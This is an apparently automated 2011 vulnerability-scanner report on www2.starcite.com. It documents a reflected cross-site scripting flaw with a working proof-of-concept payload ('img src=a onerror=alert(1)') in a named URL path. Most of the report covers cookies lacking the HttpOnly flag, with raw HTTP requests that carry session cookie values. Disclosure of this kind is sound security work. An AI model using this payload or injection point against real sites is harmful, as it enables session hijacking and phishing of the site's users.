www2.starcite.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in www2.starcite.com | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Jan 02 08:26:56 CST 2011.



Contents

1. Cross-site scripting (reflected)

2. Cookie without HttpOnly flag set

2.1. http://www2.starcite.com/starcite/

2.2. http://www2.starcite.com/starcite

2.3. http://www2.starcite.com/starcite/Solutionvideo/form.html

2.4. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html

2.5. http://www2.starcite.com/starcite/blogapi/rsd

2.6. http://www2.starcite.com/starcite/customerlogin

2.7. http://www2.starcite.com/starcite/customers

2.8. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

2.9. http://www2.starcite.com/starcite/elqNow/elqCfg.js

2.10. http://www2.starcite.com/starcite/elqNow/elqImg.js

2.11. http://www2.starcite.com/starcite/files/SIMPLIFY2.png

2.12. http://www2.starcite.com/starcite/files/Xerox_logo.gif

2.13. http://www2.starcite.com/starcite/files/garland_favicon.ico

2.14. http://www2.starcite.com/starcite/files/garland_logo.gif

2.15. http://www2.starcite.com/starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif

2.16. http://www2.starcite.com/starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif

2.17. http://www2.starcite.com/starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif

2.18. http://www2.starcite.com/starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif

2.19. http://www2.starcite.com/starcite/files/kblog_0.jpg

2.20. http://www2.starcite.com/starcite/files/logo_2010_vuc.jpg

2.21. http://www2.starcite.com/starcite/files/nbtafoundation.gif

2.22. http://www2.starcite.com/starcite/files/partner_pfizer.gif

2.23. http://www2.starcite.com/starcite/files/what-we-do-header.jpg

2.24. http://www2.starcite.com/starcite/files/whitepapers_icon.png

2.25. http://www2.starcite.com/starcite/home

2.26. http://www2.starcite.com/starcite/images/bg_btm1.gif

2.27. http://www2.starcite.com/starcite/images/bg_midtop.gif

2.28. http://www2.starcite.com/starcite/images/bg_midtop_extension.gif

2.29. http://www2.starcite.com/starcite/images/content_left_bg.gif

2.30. http://www2.starcite.com/starcite/images/content_right_bg.gif

2.31. http://www2.starcite.com/starcite/images/left_bdr.gif

2.32. http://www2.starcite.com/starcite/images/right_bdr.gif

2.33. http://www2.starcite.com/starcite/images/separator.gif

2.34. http://www2.starcite.com/starcite/images/spacer.gif

2.35. http://www2.starcite.com/starcite/jobs

2.36. http://www2.starcite.com/starcite/locations

2.37. http://www2.starcite.com/starcite/misc/drupal.js

2.38. http://www2.starcite.com/starcite/misc/forms.css

2.39. http://www2.starcite.com/starcite/misc/jquery.js

2.40. http://www2.starcite.com/starcite/misc/jquery/functions.js

2.41. http://www2.starcite.com/starcite/misc/jquery/jquery-1.2.6.js

2.42. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js

2.43. http://www2.starcite.com/starcite/misc/jquery/jquery.validate.js

2.44. http://www2.starcite.com/starcite/misc/jquery_new.js

2.45. http://www2.starcite.com/starcite/misc/reset.css

2.46. http://www2.starcite.com/starcite/modules/Suppliers_howitworks/howitworks.js

2.47. http://www2.starcite.com/starcite/modules/addregions/addregions.js

2.48. http://www2.starcite.com/starcite/modules/cck/content.css

2.49. http://www2.starcite.com/starcite/modules/cck/fieldgroup.css

2.50. http://www2.starcite.com/starcite/modules/date/date.css

2.51. http://www2.starcite.com/starcite/modules/date/date_popup/themes/timeentry.css

2.52. http://www2.starcite.com/starcite/modules/date/date_popup/themes/white.calendar.css

2.53. http://www2.starcite.com/starcite/modules/date/date_timezone/date_timezone.js

2.54. http://www2.starcite.com/starcite/modules/jstools/jquery.history_remote.pack.js

2.55. http://www2.starcite.com/starcite/modules/jstools/jstools.js

2.56. http://www2.starcite.com/starcite/modules/jstools/tabs/drupal-tabs.css

2.57. http://www2.starcite.com/starcite/modules/jstools/tabs/jquery.tabs.pack.js

2.58. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.css

2.59. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.js

2.60. http://www2.starcite.com/starcite/modules/meetings2/meetings.js

2.61. http://www2.starcite.com/starcite/modules/meetings3/meetings.js

2.62. http://www2.starcite.com/starcite/modules/meetings4/meetings.js

2.63. http://www2.starcite.com/starcite/modules/meetingsmeetings.js

2.64. http://www2.starcite.com/starcite/modules/node/node.css

2.65. http://www2.starcite.com/starcite/modules/planners_howitworks/howitworks.js

2.66. http://www2.starcite.com/starcite/modules/supplier_products/supplier_products.js

2.67. http://www2.starcite.com/starcite/modules/system/defaults.css

2.68. http://www2.starcite.com/starcite/modules/system/system.css

2.69. http://www2.starcite.com/starcite/modules/technology_overview/technology_overview.js

2.70. http://www2.starcite.com/starcite/modules/user/user.css

2.71. http://www2.starcite.com/starcite/morronijq.js

2.72. http://www2.starcite.com/starcite/news

2.73. http://www2.starcite.com/starcite/newsandevents

2.74. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

2.75. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

2.76. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

2.77. http://www2.starcite.com/starcite/newsletters/november2010/index.html

2.78. http://www2.starcite.com/starcite/node/100

2.79. http://www2.starcite.com/starcite/node/335/445

2.80. http://www2.starcite.com/starcite/node/929

2.81. http://www2.starcite.com/starcite/planners/findtherightsolution

2.82. http://www2.starcite.com/starcite/planners/howitworks

2.83. http://www2.starcite.com/starcite/planners/meetings1-1

2.84. http://www2.starcite.com/starcite/planners/requestmoreinformation

2.85. http://www2.starcite.com/starcite/privacy

2.86. http://www2.starcite.com/starcite/resource/findresources

2.87. http://www2.starcite.com/starcite/resourcecenter/downloads/a

2.88. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

2.89. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

2.90. http://www2.starcite.com/starcite/sitemap

2.91. http://www2.starcite.com/starcite/slideshow/images/bgsmall.png

2.92. http://www2.starcite.com/starcite/slideshow/images/big-picture_r1_c1.gif

2.93. http://www2.starcite.com/starcite/slideshow/images/big-picture_r2_c1.gif

2.94. http://www2.starcite.com/starcite/slideshow/images/big-picture_r3_c1.gif

2.95. http://www2.starcite.com/starcite/slideshow/images/bpsmall.png

2.96. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_1.jpg

2.97. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_2.jpg

2.98. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_3.jpg

2.99. http://www2.starcite.com/starcite/slideshow/images/buysol.png

2.100. http://www2.starcite.com/starcite/slideshow/images/corpsol.png

2.101. http://www2.starcite.com/starcite/slideshow/images/meetings1.jpg

2.102. http://www2.starcite.com/starcite/slideshow/images/meetings2.jpg

2.103. http://www2.starcite.com/starcite/slideshow/images/meetings3a.jpg

2.104. http://www2.starcite.com/starcite/slideshow/images/meetings3b.jpg

2.105. http://www2.starcite.com/starcite/slideshow/images/meetings3c.jpg

2.106. http://www2.starcite.com/starcite/slideshow/images/rock-star_1.gif

2.107. http://www2.starcite.com/starcite/slideshow/images/rock-star_2.gif

2.108. http://www2.starcite.com/starcite/slideshow/images/rock-star_3.gif

2.109. http://www2.starcite.com/starcite/slideshow/images/rssmall.png

2.110. http://www2.starcite.com/starcite/slideshow/images/slide4small.png

2.111. http://www2.starcite.com/starcite/solutions

2.112. http://www2.starcite.com/starcite/supplier-video/index.html

2.113. http://www2.starcite.com/starcite/suppliers/howitworks

2.114. http://www2.starcite.com/starcite/themes/garland/iestyle.css

2.115. http://www2.starcite.com/starcite/themes/garland/iestyle6.css

2.116. http://www2.starcite.com/starcite/themes/garland/images/arrow_small.gif

2.117. http://www2.starcite.com/starcite/themes/garland/images/bg_image.gif

2.118. http://www2.starcite.com/starcite/themes/garland/images/block_bg.gif

2.119. http://www2.starcite.com/starcite/themes/garland/images/blue_bdr.jpg

2.120. http://www2.starcite.com/starcite/themes/garland/images/blue_lbdr.jpg

2.121. http://www2.starcite.com/starcite/themes/garland/images/blue_rbdr.jpg

2.122. http://www2.starcite.com/starcite/themes/garland/images/btn_continue.gif

2.123. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_left.jpg

2.124. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_right.jpg

2.125. http://www2.starcite.com/starcite/themes/garland/images/content_left_bg0.gif

2.126. http://www2.starcite.com/starcite/themes/garland/images/content_right_bg0.gif

2.127. http://www2.starcite.com/starcite/themes/garland/images/footer-boxleft.gif

2.128. http://www2.starcite.com/starcite/themes/garland/images/footer-boxmiddle.gif

2.129. http://www2.starcite.com/starcite/themes/garland/images/footer-boxright.gif

2.130. http://www2.starcite.com/starcite/themes/garland/images/grey_bbdr.gif

2.131. http://www2.starcite.com/starcite/themes/garland/images/grey_lbdr.gif

2.132. http://www2.starcite.com/starcite/themes/garland/images/grey_left_bbdr1.gif

2.133. http://www2.starcite.com/starcite/themes/garland/images/grey_left_tbdr.gif

2.134. http://www2.starcite.com/starcite/themes/garland/images/grey_rbdr.gif

2.135. http://www2.starcite.com/starcite/themes/garland/images/grey_right_bbdr1.gif

2.136. http://www2.starcite.com/starcite/themes/garland/images/grey_right_tbdr.gif

2.137. http://www2.starcite.com/starcite/themes/garland/images/grey_tbdr.gif

2.138. http://www2.starcite.com/starcite/themes/garland/images/header_top-ie.png

2.139. http://www2.starcite.com/starcite/themes/garland/images/href_arrow.gif

2.140. http://www2.starcite.com/starcite/themes/garland/images/left_bdr.gif

2.141. http://www2.starcite.com/starcite/themes/garland/images/link-cust-login.gif

2.142. http://www2.starcite.com/starcite/themes/garland/images/new-bg.gif

2.143. http://www2.starcite.com/starcite/themes/garland/images/right_bdr.gif

2.144. http://www2.starcite.com/starcite/themes/garland/images/secondarymenuactive.gif

2.145. http://www2.starcite.com/starcite/themes/garland/images/section_btm.gif

2.146. http://www2.starcite.com/starcite/themes/garland/images/section_btm_blue.jpg

2.147. http://www2.starcite.com/starcite/themes/garland/images/section_top.gif

2.148. http://www2.starcite.com/starcite/themes/garland/images/section_top_blue.jpg

2.149. http://www2.starcite.com/starcite/themes/garland/images/separator_top.gif

2.150. http://www2.starcite.com/starcite/themes/garland/images/site_topbg.gif

2.151. http://www2.starcite.com/starcite/themes/garland/images/spacer.gif

2.152. http://www2.starcite.com/starcite/themes/garland/images/tableftF.gif

2.153. http://www2.starcite.com/starcite/themes/garland/images/tabrightF.gif

2.154. http://www2.starcite.com/starcite/themes/garland/print.css

2.155. http://www2.starcite.com/starcite/themes/garland/promo-rotation2.css

2.156. http://www2.starcite.com/starcite/themes/garland/starcite.css

2.157. http://www2.starcite.com/starcite/themes/garland/style.css

2.158. http://www2.starcite.com/starcite/themes/garland/views-list-Newsview.css

2.159. http://www2.starcite.com/starcite/themes/garland/views-list-customersuccessview.css

2.160. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css

2.161. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css

2.162. http://www2.starcite.com/starcite/themes/garland/views-list-webinarview.css

2.163. http://www2.starcite.com/starcite/themes/garland/views-list-whatwedocustomersuccessview.css

2.164. http://www2.starcite.com/starcite/whatwedo/ourtechnology

2.165. http://www2.starcite.com/starcite/whatwedo/overview

2.166. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

3. Source code disclosure

3.1. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

3.2. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

3.3. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

3.4. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

3.5. http://www2.starcite.com/starcite/planners/findtherightsolution

3.6. http://www2.starcite.com/starcite/planners/howitworks

3.7. http://www2.starcite.com/starcite/planners/requestmoreinformation

3.8. http://www2.starcite.com/starcite/resource/findresources

3.9. http://www2.starcite.com/starcite/suppliers/howitworks

3.10. http://www2.starcite.com/starcite/whatwedo/ourtechnology

3.11. http://www2.starcite.com/starcite/whatwedo/overview

3.12. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

4. Cross-domain script include

4.1. http://www2.starcite.com/starcite/

4.2. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html

4.3. http://www2.starcite.com/starcite/customerlogin

4.4. http://www2.starcite.com/starcite/customers

4.5. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

4.6. http://www2.starcite.com/starcite/home

4.7. http://www2.starcite.com/starcite/jobs

4.8. http://www2.starcite.com/starcite/locations

4.9. http://www2.starcite.com/starcite/misc/reset.css

4.10. http://www2.starcite.com/starcite/modules/meetingsmeetings.js

4.11. http://www2.starcite.com/starcite/news

4.12. http://www2.starcite.com/starcite/newsandevents

4.13. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

4.14. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

4.15. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

4.16. http://www2.starcite.com/starcite/node/100

4.17. http://www2.starcite.com/starcite/node/335/445

4.18. http://www2.starcite.com/starcite/node/929

4.19. http://www2.starcite.com/starcite/planners/findtherightsolution

4.20. http://www2.starcite.com/starcite/planners/howitworks

4.21. http://www2.starcite.com/starcite/planners/meetings1-1

4.22. http://www2.starcite.com/starcite/planners/requestmoreinformation

4.23. http://www2.starcite.com/starcite/privacy

4.24. http://www2.starcite.com/starcite/resource/findresources

4.25. http://www2.starcite.com/starcite/resourcecenter/downloads/a

4.26. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

4.27. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

4.28. http://www2.starcite.com/starcite/sitemap

4.29. http://www2.starcite.com/starcite/solutions

4.30. http://www2.starcite.com/starcite/suppliers/howitworks

4.31. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css

4.32. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css

4.33. http://www2.starcite.com/starcite/whatwedo/ourtechnology

4.34. http://www2.starcite.com/starcite/whatwedo/overview

4.35. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

5. Email addresses disclosed

5.1. http://www2.starcite.com/starcite/

5.2. http://www2.starcite.com/starcite/customerlogin

5.3. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

5.4. http://www2.starcite.com/starcite/home

5.5. http://www2.starcite.com/starcite/locations

5.6. http://www2.starcite.com/starcite/misc/forms.css

5.7. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js

5.8. http://www2.starcite.com/starcite/node/929

5.9. http://www2.starcite.com/starcite/privacy

6. HTML does not specify charset



1. Cross-site scripting (reflected)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9154b"><img%20src%3da%20onerror%3dalert(1)>6a03df3b79 was submitted in the REST URL parameter 4. This input was echoed as 9154b"><img src=a onerror=alert(1)>6a03df3b79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b"><img%20src%3da%20onerror%3dalert(1)>6a03df3b79 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:23:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:23:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:01 GMT;path=/
Content-Length: 37080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<input name="FilePath" value="bridging-gap-mitigating-meetings-risk9154b"><img src=a onerror=alert(1)>6a03df3b79" />
...[SNIP]...

2. Cookie without HttpOnly flag set
There are 166 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www2.starcite.com/starcite/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.starcite.com
Path:   /starcite/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /starcite/ HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; expires=Tue, 25 Jan 2011 17:30:23 GMT; path=/; domain=.www2.starcite.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:30 GMT;path=/
Content-Length: 39548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...

2.2. http://www2.starcite.com/starcite

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
Location: http://www2.starcite.com/starcite/
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:29 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.starcite.co
...[SNIP]...

2.3. http://www2.starcite.com/starcite/Solutionvideo/form.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/form.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/Solutionvideo/form.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:46 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 19:17:52 GMT
ETag: "29000000002dbf-60b5-47703a6b9d474"
Accept-Ranges: bytes
Content-Length: 24757
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...

2.4. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/modules/meetings1to1/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/Solutionvideo/modules/meetings1to1/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:48 GMT
Server: Apache
Last-Modified: Mon, 26 Apr 2010 20:37:10 GMT
ETag: "1000000003200-dd5-48529bdc203b0"
Accept-Ranges: bytes
Content-Length: 3541
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Starcite
...[SNIP]...

2.5. http://www2.starcite.com/starcite/blogapi/rsd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/blogapi/rsd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/blogapi/rsd HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 639
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
Content-Type: application/rsd+xml; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:52 GMT;path=/

<?xml version="1.0"?>
<rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
<service>
<engineName>Drupal</engineName>
<engineLink>http://drupal.org/</engineLink>
<homePageLin
...[SNIP]...

2.6. http://www2.starcite.com/starcite/customerlogin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customerlogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/customerlogin HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
